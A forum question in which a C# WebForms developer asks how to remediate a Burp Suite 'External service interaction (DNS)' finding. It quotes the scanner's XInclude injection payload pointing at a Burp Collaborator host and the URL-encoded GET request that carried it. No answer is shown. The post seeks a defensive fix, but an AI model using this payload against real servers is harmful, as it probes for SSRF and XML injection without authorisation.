How to Prevent/Fix - External service interaction (DNS)

Question

I got this burp vulnerability report - External service interaction (DNS)

XML is injected in the URL Path. I wonder if anyone has any idea how to prevent this. I'm working on a web application using Visual Studio with WebForms C#.

I was thinking maybe it could be prevented from IIS or the web.config file but I'm not sure.

---

Issue Details

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The payload:

<iaz xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/>
</iaz>

... was submitted in the URL path filename. This payload contains some XML with an XInclude expression that references a URL on an external domain.

The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected XInclude definition.

---

GET /ViewEmployee/%3ciaz%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo%22/%3e%3c/iaz%3e?RequestId=428 HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close